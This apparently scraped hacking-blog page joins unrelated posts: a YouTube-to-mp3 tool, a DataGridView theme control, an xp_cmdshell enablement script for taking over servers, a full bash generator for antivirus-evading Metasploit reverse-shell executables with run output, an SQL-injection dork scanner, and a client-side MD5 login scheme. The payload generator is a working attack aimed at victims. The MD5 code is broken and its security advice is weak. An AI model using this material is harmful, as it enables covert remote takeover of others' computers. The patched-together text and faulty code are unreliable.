Now download your favourite music from youtube as mp3. Youtube-2-mp3 converts the audio-track of your video-file to mp3. The conversion hardly takes 10-20 seconds , the only thing you need is a YouTube URL. The conversion will be performed in a high quality mode with a bitrate of at least 128 kBit/s. Youtube-2-mp3 also monitors the clipboard data as soon as you copy any YouTube link it will automatically add it to the download list.
As we know a DataGridView control provides a customizable table for displaying data. This control is designed to be a complete solution for displaying tabular data with Windows Forms. Also the DataGridView class allows us to customization of cells, rows, columns, and borders through the use of its properties.
So i have used and extended the properties of DataGridView and made a user control with predefined set of 8 Themes in it.so that the boring look of the control can be changed to some cool looks :)
You can set the theme of the DataGridView by GridTheme Property:-
Its a short tutorial on owning a windows server with MS Sql Server [xp_cmdshell]. In this scenario iam not using any hacking tools. All i have is password for 'sa' account of SQL Server.
Script to Enable xp_cmdshell in MS SQL Server :-
-- To allow advanced options to be changed. EXECsp_configure'show advanced options', 1 GO -- To update the currently configured value for advanced options. RECONFIGURE GO -- To enable the feature. EXECsp_configure 'xp_cmdshell', 1 GO -- To update the currently configured value for this feature. RECONFIGURE GO
Based on coresec.org article to create fully undetectable metasploit payload, i have modified the to payload to work with both WAN and LAN IP. So it is possible to exploit a system outside a network :)
Code :
#!/bin/bash echo "************************************************************" echo " Automatic shellcode generator - FOR METASPLOIT " echo " By Astr0baby 2011 Modified By DJ MAK 2012 " echo " With some Randomic gravy and sauce to bypass Antivirus " echo " For Automatic Teensy programming and deployment " echo "************************************************************"
Code :
rm -rf ShellCode
echo -e "1) LanIP \n2) WanIP?" read netchoice case $netchoice in 1) echo "Here is a network device list available on yor machine" cat /proc/net/dev | tr -s ' ' | cut -d ' ' -f1,2 | sed -e '1,2d' echo -e "What network interface are we gonna use ? \c" read interface IP=`ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;; 2) echo -e "======Getting your WAN IP=========" IP=`wget -q -O - http://checkip.dyndns.org | cut -d ':' -f2 | cut -d '<' -f1 | cut -d ' ' -f2`;; esac echo $IP echo -e "What Port Number are we gonna listen to? : \c" read port echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c" read seed echo -e "And lastly how many times do we want to encode our payloads 1-20? : \c" read enumber msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c $enumber -t raw | msfencode -e x86/jmp_call_additive -c $enumber -t raw | msfencode -e x86/call4_dword_xor -c $enumber -t raw | msfencode -e x86/shikata_ga_nai -c $enumber > test.c mkdir ShellCode mv test.c ShellCode cd ShellCode #Replacing plus signs at the end of line sed -e 's/+/ /g' test.c > clean.c sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c echo "#include " >> temp echo 'unsigned char ufs[]=' >> temp for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2 sed -i 's/$/"/' temp2 sed -i 's/^/"/' temp2 echo ';' >> temp2 cat temp2 >> temp cat ready.c >> temp mv temp ready2.c echo ";" >> ready2.c echo "int main(void) { ((void (*)())micro)();}" >> ready2.c mv ready2.c final.c echo 'unsigned char tap[]=' > temp3 for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4 sed -i 's/$/"/' temp4 sed -i 's/^/"/' temp4 echo ';' >> temp4 cat temp4 >> temp3 cat temp3 >> final.c #Cleanup rm -f clean.c rm -f test.c rm -f ready.c rm -f rand.c rm -f temp2 rm -f temp3 rm -f temp4
/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1 mv final.exe $RANDOM.exe filex=`ls -ct1 | head -1` sumx=`sha1sum $filex` echo $filex "...generated in ShellCode subfolder" echo $filex "sha1checksum is .." $sumx strip --strip-debug $filex cd .. echo " starting the meterpreter listener..." sleep 2 msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port AutoRunScript='migrate.rb -n explorer.exe' E
Save the file as fud.sh And set the permission to Execute :
Code :
root@t3amas5assin:~/Desktop# chmod +x fud.sh root@t3amas5assin:~/Desktop# ./fud.sh ************************************************************ Automatic shellcode generator - FOR METASPLOIT By Astr0baby 2011 Modified By DJ MAK 2012 With some Randomic gravy and sauce to bypass Antivirus For Automatic Teensy programming and deployment ************************************************************ 1) LanIP 2) WanIP? 2 ======Getting your WAN IP========= 114.79.135.104 What Port Number are we gonna listen to? : 5676 Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : 1000 And lastly how many times do we want to encode our payloads 1-20? : 5 [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/jmp_call_additive succeeded with size 457 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 489 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 521 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 553 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 585 (iteration=5)
[*] x86/call4_dword_xor succeeded with size 614 (iteration=1)
[*] x86/call4_dword_xor succeeded with size 642 (iteration=2)
[*] x86/call4_dword_xor succeeded with size 670 (iteration=3)
[*] x86/call4_dword_xor succeeded with size 698 (iteration=4)
[*] x86/call4_dword_xor succeeded with size 726 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 753 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 780 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 807 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 834 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 861 (iteration=5)
31963.exe ...generated in ShellCode subfolder 31963.exe sha1checksum is..675ee8fa2daf8533fe2c2ebe941de78948fa776a 31963.exe starting the meterpreter listener...
As soon as the the payload is executed on the Victims machine it will automatically migrate to explorer.exe Process
The payload is almost undetectable from most of the virus Engines!!!!
SQLI Hunter is an automation tool to scan for an Sql Injection vulnerability in a website. It automates the search of sqli vulnerable links from Google using google dorks! Current version supports only 96 results.
SQLI Hunter can also find admin page of any website by using some predefined admin page lists.
Personal information security, one of the hottest topics on the lips of web professionals across the globe. How do we stop people not only hacking our sites and causing us inconvenience, but also how do we stop people accessing our users' personal information? Right now there is one major answer to these questions, SSL (secure socket layer). Proven technology which has fueled a boom in online transactions, allowing people to buy anything from dressing gowns to airplanes. However, SSL certificates can be costly to smaller web masters. These millions of people who offer a free service to the world hoping that their advertising may at least pay their hosting. Here is a small scale solution which can provide these people with an extra layer of security.
WARNING (Please Read)
This is a SMALL SCALE solution not intended for the communication of private information. This type of security should NOT be used on e-commerce applications or anything which deals with personal information of any kind. This is suitable only for small sites with log in areas which if compromised will not cause the leakage of valuable data.
How Can I Secure my Users Without SSL?
A large number of user on the web accounts which are compromised are the result of package sniffing. People who set up their servers to monitor packets which pass by for potentially valuable information. When using SSL this is not an issue since the encryption makes the data illegible to the sniffer but when using an open connection someone can easily pick up on an unencrypted user name and password. The key to SSL is that the data is encrypted before transport and we need to do that as regularly as we can. As web developers on the only client side resource available is JavaScript, executing on the users machine. We can use this (when enabled) to encrypt our data for us before it is sent to the server. Ofcourse this will only work when JavaScript is enabled but it is better that it is sometimes present rather than not there at all.
How Can I Implement this JavaScript Encryption?
You could argue that there are many ways to do this and this is only one. JavaScript does not have the likes of MD5 built in which can be used in other technologies to one-way encrypt data. However, it is possible to access it in the form of an user defined function. The best one I found for this was here : http://pajhome.org.uk/crypt/md5/index.html.
Once you have MD5 working on both server and client, you can use it to hash the password of your user when they submit the form just prior to it being posted in a HTTP request across the world. When your server receives this hashed password it can compare it to its records and authenticate it since you should be storing encrypted passwords anyway. Storing plain text passwords is EXTREMELY bad practice and should be avoided at all times. If someone were to hack your database your users would be in a whole lot of trouble and it would be all YOUR fault. People often use the same password on different sites so they could lose there account on more than just your website.
But How Do I Know if the Password has been Encrypted Client Side?
I see that there are two ways to do this. You can create a hidden input field in the DOM before submission, which when present in the post request can signify that JavaScript was enabled at the time of log in. There is also the alternative of limiting your users to passwords less than 32 characters (the length of an MD5 hash). This way you know if the password they submit is 32 characters long it has already been hashed.
Extra Server-side Security Pre-cautions
If a packet sniffer were to pick up on your newly hashed password and submit it themselves, they could easily bypass this new security making it pointless. To combat this I would recommend using time based hashing routines on the server to determine when the initial form was rendered, and timing that form out meaning it can not be submitted after a certain period of time. We can implement this by client-side hashing the password once, and then hashing it with a value given by the server concatenated on the end a second time. This value can be worked out by an algorithm on the server based on the time and can change every 5-10 minutes. At the server you can look up the users screen name in the database and hash their (already hashed) password with values which would still be valid to see if you can attain a match. If so, let them in, if not, ask them to try again. The packet sniffers could see this time based value sent by the server but if its ambiguous enough they will not be able to work out how it is calculated on the server, meaning they will have to be pretty quick to hack in.
Conclusion
There it is, user authentication encryption without a costly SSL certificate. I will re-iterate that this is not a proven solution, not all people will be able to use it since they may not have JavaScript which renders it useless. You must still offer a non-JavaScript solution which works the traditional way to meet standards and to offer your site to as many people as possible. Always remember that your users deserve you to look at ideas like this to protect them since us, the developers, are the ones who have control of this data and its up to us to do the best we can with it.
Feel free to comment below if you have any ideas which could develop this further, or maybe you have tried it and have a story to tell. Please, no people saying how it is insecure and isn't a viable option. I've stated many times that its not the securest encryption method out there and that this is not suitable for use with private data but it is cheap, easy and works where possible, which is better than transmitting plain text.
Now call this function on the client click of the Submit or Login Button
Now you need to Compare the MD5 hash in the Server Code
For Example :
If you want to validate password="123456"
Then call the makeMD5Hash Function in the server code
VB.NET
If txtpass.text=makeMD5Hash("123456") Then
'Login Success
End If
Function makeMD5Hash(ByVal strToHash as String) as String Dim strToHash As String Dim md5Obj As New Security.Cryptography.MD5CryptoServiceProvider Dim bytesToHash() As Byte = System.Text.Encoding.ASCII.GetBytes(strToHash) bytesToHash = md5Obj.ComputeHash(bytesToHash) Dim strResult As String = "" For Each b As Byte In bytesToHash strResult += b.ToString("x2") Next Return strResult End Function
C#.NET
if (txtpass.text == makeMD5Hash("123456")) { //Login Success
} public string makeMD5Hash(string strToHash) { string strToHash = null; System.Security.Cryptography.MD5CryptoServiceProvider md5Obj = new System.Security.Cryptography.MD5CryptoServiceProvider(); byte[] bytesToHash = System.Text.Encoding.ASCII.GetBytes(strToHash); bytesToHash = md5Obj.ComputeHash(bytesToHash); string strResult = ""; foreach (byte b in bytesToHash) { strResult += b.ToString("x2"); } return strResult; }
